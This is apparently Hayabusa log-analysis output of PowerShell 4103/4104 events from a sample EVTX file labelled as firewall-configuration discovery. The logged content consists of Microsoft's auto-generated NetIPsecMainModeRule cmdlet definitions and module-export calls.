(@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Disable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Disable-NetIPsecMainModeRule'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.817 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; value=""Set-StrictMode""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.817 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.817 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.817 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.817 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetIPsecMainModeRule""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.817 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecMainModeRule""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.817 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecMainModeRule""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.817 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecMainModeRule""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.817 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetIPsecMainModeRule""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.817 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetIPsecMainModeRule""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.817 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Enable-NetIPsecMainModeRule""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.817 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Disable-NetIPsecMainModeRule""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.817 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.817 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function New-NetIPsecMainModeRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${Platform}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${MainModeCryptoSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MainModeCryptoSet')) { [object]$__cmdletization_value = ${MainModeCryptoSet} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.817 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] 